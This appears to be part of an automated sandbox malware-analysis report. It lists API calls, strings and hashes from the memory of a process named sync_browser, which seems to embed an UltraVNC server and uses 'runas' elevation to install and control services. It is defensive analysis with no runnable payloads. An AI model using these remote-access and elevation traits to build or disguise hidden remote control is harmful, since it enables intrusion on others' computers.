ResetEvent.KERNEL32 ref: 00007FF7D5947FF0
SetEvent.KERNEL32 ref: 00007FF7D5947FFA
WaitForSingleObject.KERNEL32 ref: 00007FF7D5948009
WaitForSingleObject.KERNEL32 ref: 00007FF7D594804A
SetEvent.KERNEL32 ref: 00007FF7D5948066

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Event$ObjectResetSingleWait$CriticalEnterSection
String ID:
API String ID: 3343876880-0
Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
Instruction ID: e3859c60aedbc9a0ae5b95c915a751ec5f5d81461b25ff9e33904583115a912b
Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
Instruction Fuzzy Hash: 28213062A28B8197EB58AB26D5842BCA720FB85F95FC04032DF1E57654CF3CE4B5C710

Function 00007FF7D59419A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7D59419C6
Process32First.KERNEL32 ref: 00007FF7D59419E5
CloseHandle.KERNEL32 ref: 00007FF7D59419F2
Process32Next.KERNEL32 ref: 00007FF7D5941A20
CloseHandle.KERNEL32 ref: 00007FF7D5941A2D

Strings

winlogon.exe, xrefs: 00007FF7D5941A00

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID: winlogon.exe
API String ID: 1789362936-961692650
Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
Instruction ID: e2700e2f720123e407563f00a70591714a5c48e0f5810c78f582f6349946a22d
Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
Instruction Fuzzy Hash: D5113031618A4686EB24AB25F8146AEA7A0FFC8F98FC44232DD5E47294DF3CD505CB10

Function 00007FF7D5943620 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D594364B
GetForegroundWindow.USER32 ref: 00007FF7D594365C
ShellExecuteExA.SHELL32 ref: 00007FF7D594369F

Strings

p, xrefs: 00007FF7D5943653
-rebootforce, xrefs: 00007FF7D5943693
runas, xrefs: 00007FF7D5943671

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -rebootforce$p$runas
API String ID: 3648085421-45594291
Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
Instruction ID: e582c9ee7d2f8d1da9c3763bdd937ec6d81f9a082d6e564d19548dfebdbcce3d
Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
Instruction Fuzzy Hash: 9101E532619B8186E625AF20F49479BB7A4FB89744FC0013AEACD02B68DF3CD158CB10

Function 00007FF7D5939910 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5939939
GetForegroundWindow.USER32 ref: 00007FF7D5939948
ShellExecuteExA.SHELL32 ref: 00007FF7D5939997

Strings

-stopservice, xrefs: 00007FF7D593997A
p, xrefs: 00007FF7D593993F
runas, xrefs: 00007FF7D5939953

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -stopservice$p$runas
API String ID: 3648085421-4230321595
Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
Instruction ID: 0d7054da8c68be5e96f8550efb5d1da1ab55919132fb1b376b9e46f86d45dbd3
Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
Instruction Fuzzy Hash: 1B01C836619B8186E764AB20F49479EB7A4FB89B48FC00236DACD06B58DF7DD118CB50

Function 00007FF7D5939A70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5939A99
GetForegroundWindow.USER32 ref: 00007FF7D5939AA8
ShellExecuteExA.SHELL32 ref: 00007FF7D5939AF7

Strings

p, xrefs: 00007FF7D5939A9F
-install, xrefs: 00007FF7D5939ADA
runas, xrefs: 00007FF7D5939AB3

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -install$p$runas
API String ID: 3648085421-1683557327
Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
Instruction ID: a4d4a1623e10f46017574a02b508ac844e587a06a19df2e4dad247293b60f742
Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
Instruction Fuzzy Hash: 7F01DA36619B8186E764AB10F49479EB7A4FB89B48FC00236DACD07B58DF7DD118CB50

Function 00007FF7D59399C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D59399E9
GetForegroundWindow.USER32 ref: 00007FF7D59399F8
ShellExecuteExA.SHELL32 ref: 00007FF7D5939A47

Strings

p, xrefs: 00007FF7D59399EF
-startservice, xrefs: 00007FF7D5939A2A
runas, xrefs: 00007FF7D5939A03

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -startservice$p$runas
API String ID: 3648085421-278061118
Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction ID: 64b9eaa6f991ea59cc083c56c13efa819ab0f0cde98c7349ca8e6fc2811aeaf3
Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
Instruction Fuzzy Hash: 7F011A36618B8186E764AB10F49479EB7A4FB88B48FC00236DACD03B58DF7DD118CB50

Function 00007FF7D596BA00 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 117COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF7D596BA9C
malloc.LIBCMT ref: 00007FF7D596BAAC

Strings

vncencoder.cpp : remote palette data requested, xrefs: 00007FF7D596BA21
vncencoder.cpp : generating 8-bit palette data, xrefs: 00007FF7D596BB3B
vncencoder.cpp : failed to obtain colour map data!, xrefs: 00007FF7D596BB95
vncencoder.cpp : generating BGR233 palette data, xrefs: 00007FF7D596BA79

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: freemalloc
String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
API String ID: 3061335427-2748099863
Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
Instruction ID: 93f0895fa257ec9b59380ebb96eb52479b3442d4352924f5fdf8bf5b822cac05
Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
Instruction Fuzzy Hash: 2B41F7A2A1969286F714AB20E40177DBBA1EF54F88FC44133EE4D4769AEF3CE505C760

Function 00007FF7D593C6A0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

Enter proxy authentication password for %s@%s: , xrefs: 00007FF7D593C6E0
Proxy-Authorization: Basic %s, xrefs: 00007FF7D593C78C
%s:%s, xrefs: 00007FF7D593C740

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID:
String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
API String ID: 0-3750121419
Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
Instruction ID: 5af9ba90e3295ba2106ca9de8d26f6096831e708b5d4cccbbcadc6187cb9261f
Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
Instruction Fuzzy Hash: AF31C565A0998185EA14EA66A8002ADA790EF45FF8FD41336EE3D47BD5DF3CD0428310

Function 00007FF7D59442A0 Relevance: 9.1, APIs: 6, Instructions: 101threadwindowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 00007FF7D594437C

Part of subcall function 00007FF7D5943EF0: GetModuleFileNameA.KERNEL32 ref: 00007FF7D5943F18
Part of subcall function 00007FF7D5943EF0: PlaySoundA.WINMM ref: 00007FF7D5943F85

CreateThread.KERNEL32 ref: 00007FF7D5944336
ResumeThread.KERNEL32 ref: 00007FF7D594434C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
String ID:
API String ID: 3945334538-0
Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
Instruction ID: 6a4e1e27ada7773127e8fddd701a145d9242b1b5eb6ceb0fb63e381e8f7f8681
Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
Instruction Fuzzy Hash: 6D41E422B18A4183EB14AB29E4402BDA791EBC8FA9FC44132DF4D13799DF3CD881C764

Function 00007FF7D59EAA6C Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59EAA99
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EAAA4
_fileno.LIBCMT ref: 00007FF7D59EAAD5
_errno.LIBCMT ref: 00007FF7D59EAB45
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EAB50
_ftbuf.LIBCMT ref: 00007FF7D59EAB80

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
String ID:
API String ID: 2434734397-0
Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
Instruction ID: 7346d112dd2128604359ebd9ddaf1d7acea5560c874874e06f9fe9ea6bd8fa98
Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
Instruction Fuzzy Hash: 483146A1A0E60343FE54B769585927DE6925F40FE8FD55633DC2D872E2DF3CE8418220

Function 00007FF7D594FFA0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF7D594FFFD

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

free.LIBCMT ref: 00007FF7D5950097

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

free.LIBCMT ref: 00007FF7D59500BF

Strings

vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF7D5950053
This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF7D5950068
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7D594FFE0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
API String ID: 1063416079-3080451256
Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
Instruction ID: 2ad34664e4f507796c1874a4f4b7fe94bfbd7dc32408abd7a58b19bc5c062111
Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
Instruction Fuzzy Hash: 0F315E2161868182EA00EB65E8545AEA751EF84FB8FD85333ED7E476E5DF3CD401C360

Function 00007FF7D59F37C4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37CE
FlsGetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F37DC
SetLastError.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3834

Part of subcall function 00007FF7D59F32EC: Sleep.KERNEL32(?,?,?,00007FF7D59F37F7,?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19), ref: 00007FF7D59F3331

FlsSetValue.KERNEL32(?,?,?,00007FF7D59EFFD1,?,?,?,?,00007FF7D59E8C19,?,?,?,00007FF7D59E748C), ref: 00007FF7D59F3808
free.LIBCMT ref: 00007FF7D59F382B

Part of subcall function 00007FF7D59F370C: _lock.LIBCMT ref: 00007FF7D59F3760
Part of subcall function 00007FF7D59F370C: _lock.LIBCMT ref: 00007FF7D59F377F

GetCurrentThreadId.KERNEL32 ref: 00007FF7D59F381C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
